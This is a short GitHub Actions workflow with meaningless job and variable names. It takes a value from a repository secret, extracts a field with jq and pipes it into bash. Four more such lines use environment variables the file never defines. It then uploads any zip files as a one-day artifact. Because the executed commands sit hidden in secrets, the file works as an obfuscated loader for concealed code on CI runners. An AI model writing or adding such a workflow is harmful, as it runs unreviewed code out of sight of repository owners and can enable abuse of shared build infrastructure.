name: morgancors7359
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: morgancors7359
        env:
          baru78: ${{ secrets.baru78 }}
        run: |
          printf '%s' "$baru78" | jq -r .deyo68 | /bin/bash
          printf '%s' "$dbfht2894" | jq -r .zl5 | /bin/bash
          printf '%s' "$odr2" | jq -r .hz00735 | /bin/bash
          printf '%s' "$k58" | jq -r .do49260 | /bin/bash
          echo $r1900 | jq -r .jhrpt5196 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: SaumRaS5
          path: "*.zip"
          retention-days: 1
